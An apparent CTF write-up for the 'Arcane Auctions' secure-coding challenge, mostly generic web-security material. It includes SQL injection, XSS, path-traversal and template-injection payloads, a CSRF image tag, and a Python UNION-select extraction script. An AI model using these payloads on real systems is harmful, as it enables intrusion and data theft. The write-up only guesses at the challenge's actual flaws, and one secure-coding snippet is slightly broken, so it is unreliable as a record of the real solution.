2025 Cyber Apocalypse: Arcane Auctions

#htb #ctf #secure-coding #web #vulnerability

Challenge Information

AttributeDetails
Event2025 Cyber Apocalypse
CategorySecure Coding
ChallengeArcane Auctions

Summary

Arcane Auctions is a secure coding challenge that focuses on identifying and exploiting common web vulnerabilities. The challenge presents a web application with intentional security flaws that violate secure coding practices. Players must identify these vulnerabilities, understand their impact, and develop exploits to prove the security weaknesses.

Analysis

Vulnerability Categories

Common vulnerabilities in secure coding challenges include:

  1. SQL Injection: Unsanitized database queries
  2. Cross-Site Scripting (XSS): Unescaped user input in HTML context
  3. Cross-Site Request Forgery (CSRF): Missing request validation tokens
  4. Authentication Bypass: Weak or missing authentication checks
  5. Authorization Flaws: Insufficient access control
  6. Input Validation: Missing or incomplete input validation
  7. Sensitive Data Exposure: Hardcoded credentials or inadequate encryption
  8. Insecure Deserialization: Unsafe object deserialization
  9. File Upload Vulnerabilities: Unrestricted file uploads
  10. Logic Flaws: Business logic errors

Application Context

The challenge is set in the Eldoria universe and likely involves:

  • An auction system for magical items
  • User authentication and authorization
  • Bid placement and management
  • Item listings and descriptions

Solution

Vulnerability Discovery Methodology

Step 1: Reconnaissance

Analyze the application for:

  • Input fields and forms
  • Authentication mechanisms
  • Database interactions
  • User roles and permissions
  • File upload functionality
  • API endpoints

Step 2: Input Validation Testing

Test common injection vectors:

' OR '1'='1
<script>alert('XSS')</script>
../../etc/passwd
${7*7}

Step 3: Authentication Testing

Test for:

  • Default credentials
  • Weak password requirements
  • Session management flaws
  • Token weaknesses

Step 4: Authorization Testing

Attempt to:

  • Access other users’ data
  • Escalate privileges
  • Bypass role checks
  • Manipulate object references

Step 5: Business Logic Testing

Look for:

  • Price manipulation
  • Bid manipulation
  • Status bypasses
  • Race conditions

Common Exploitation Patterns

SQL Injection Example

-- Vulnerable query
SELECT * FROM users WHERE username = '$input' AND password = '$pass'


-- Attack
username: admin' --
password: anything
-- Resulting query: SELECT * FROM users WHERE username = 'admin' --' AND password = '$pass'

XSS Example

<!-- Vulnerable code -->
<div id="item-name">{{ item.name }}</div>


<!-- Attack -->
Item name: <img src=x onerror="alert('XSS')">


<!-- Result -->
<img src=x onerror="alert('XSS')">

CSRF Example

<!-- Attacker's site -->
<img src="https://auction.com/bid?item_id=1&amount=0.01">


<!-- User clicks while logged in, bid placed without consent -->

Exploitation Steps

Step 1: Identify Vulnerable Endpoint

Terminal window
# Scan application for input points
curl -X GET "https://application/api/items?search=test"

Step 2: Test Vulnerability

Terminal window
# Test SQL injection
curl "https://application/api/items?id=1' OR '1'='1"


# Test XSS
curl -X POST "https://application/api/items" \
  -d "name=<script>alert('XSS')</script>"

Step 3: Develop Exploit

import requests


# Exploit vulnerable endpoint
payload = "1' UNION SELECT NULL, flag FROM flags WHERE '1'='1"
response = requests.get(
    "https://application/api/search",
    params={"query": payload}
)


print(response.text)

Step 4: Extract Flag

Once vulnerability is confirmed, extract flag or sensitive information.

Secure Coding Practices

Proper Implementation:

# SECURE: Use parameterized queries
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))


# SECURE: Use templating with auto-escaping
from jinja2 import Markup
return render_template('item.html', item_name=Markup(escape(item.name)))


# SECURE: Use CSRF tokens
<form method="POST">
    <input type="hidden" name="csrf_token" value="{{ csrf_token() }}">
    ...
</form>


# SECURE: Validate and sanitize input
def get_item_id(request):
    item_id = request.args.get('id', type=int)
    if item_id is None or item_id < 1:
        raise ValueError("Invalid item ID")
    return item_id

Key Takeaways

  • Defense in Depth: Multiple security layers prevent single point of failure
  • Input Validation: Always validate and sanitize user input on server-side
  • Least Privilege: Users should only have access to necessary resources
  • Secure Libraries: Use well-maintained security libraries instead of custom implementations
  • Principle of Least Trust: Never trust user input, even from “trusted” users
  • Output Encoding: Encode output based on context (HTML, URL, JavaScript, CSS)
  • Security Testing: Regular testing and code review identify vulnerabilities
  • Framework Features: Use built-in security features of frameworks (CSRF tokens, escaping)

Tools Used

  • Burp Suite: Web application security testing
  • OWASP ZAP: Automated vulnerability scanning
  • sqlmap: SQL injection detection and exploitation
  • curl/Postman: Manual request testing
  • Python: Custom exploit development

References